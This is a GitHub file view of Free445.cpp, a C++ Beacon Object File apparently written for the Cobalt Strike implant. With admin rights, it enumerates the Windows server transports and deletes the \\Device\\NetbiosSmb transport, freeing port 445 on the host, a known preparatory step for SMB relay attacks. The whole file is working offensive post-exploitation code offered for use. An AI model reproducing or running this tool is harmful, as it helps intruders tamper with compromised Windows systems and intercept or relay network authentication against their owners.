-
Notifications
You must be signed in to change notification settings - Fork 8
/
Free445.cpp
93 lines (80 loc) · 2.81 KB
/
Free445.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#include <windows.h>
#include <Lm.h>
extern "C" {
#include "beacon.h"
void go(char* buff, int len);
WINBASEAPI DWORD WINAPI NETAPI32$NetServerTransportEnum(LPWSTR,DWORD,PBYTE*,DWORD,PDWORD,PDWORD,PDWORD);
WINBASEAPI DWORD WINAPI NETAPI32$NetServerTransportDel(LPWSTR,DWORD,PBYTE);
WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcscmp(const wchar_t *_lhs,const wchar_t *_rhs);
}
void go(char * args, int alen) {
if (!BeaconIsAdmin()) {
BeaconPrintf(CALLBACK_ERROR, "Sorry, You are not Admin !\n");
return;
}
wchar_t* transport = L"\\Device\\NetbiosSmb";
LPSERVER_TRANSPORT_INFO_0 pBuf = NULL;
LPSERVER_TRANSPORT_INFO_0 pTmpBuf;
DWORD dwLevel = 0;
DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH;
DWORD dwEntriesRead = 0;
DWORD dwTotalEntries = 0;
DWORD dwResumeHandle = 0;
DWORD dwTotalCount = 0;
NET_API_STATUS nStatus;
LPTSTR pszServerName = NULL;
DWORD i;
bool found = false;
do
{
// Call the NetServerTransportEnum function; specify level 0.
nStatus = NETAPI32$NetServerTransportEnum(pszServerName,
dwLevel,
(LPBYTE *)&pBuf,
dwPrefMaxLen,
&dwEntriesRead,
&dwTotalEntries,
&dwResumeHandle);
if((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
{
if((pTmpBuf = pBuf) != NULL)
{
// Loop through the entries; process access errors
for(i = 0; i < dwEntriesRead; i++)
{
if(pTmpBuf == NULL)
{
BeaconPrintf(CALLBACK_ERROR, "An access violation has occurred\n");
break;
}
// Print the transport protocol name
BeaconPrintf(CALLBACK_OUTPUT, "Found Transport: %ls\n", pTmpBuf->svti0_transportname);
// Delete it if it's the one we want
if(0 == MSVCRT$wcscmp(pTmpBuf->svti0_transportname, transport))
{
NET_API_STATUS status = NETAPI32$NetServerTransportDel(pszServerName, dwLevel, (LPBYTE)pTmpBuf);
if(NERR_Success == status)
{
BeaconPrintf(CALLBACK_OUTPUT, "Deleted %ls\n", transport);
found = true;
}
else BeaconPrintf(CALLBACK_ERROR, "Error %d while deleting %ls\n", status, transport);
}
pTmpBuf++;
dwTotalCount++;
}
}
}
else BeaconPrintf(CALLBACK_ERROR, "A system error has occurred: %d\n", nStatus);
// Free the allocated buffer
if(pBuf != NULL)
{
NETAPI32$NetApiBufferFree(pBuf);
pBuf = NULL;
}
} while(nStatus == ERROR_MORE_DATA); // Continue to call NetServerTransportEnum while there are more entries
// Check again for an allocated buffer.
if(pBuf != NULL) NETAPI32$NetApiBufferFree(pBuf);
BeaconPrintf(CALLBACK_OUTPUT,"Total of %d entries enumerated\n", dwTotalCount);
}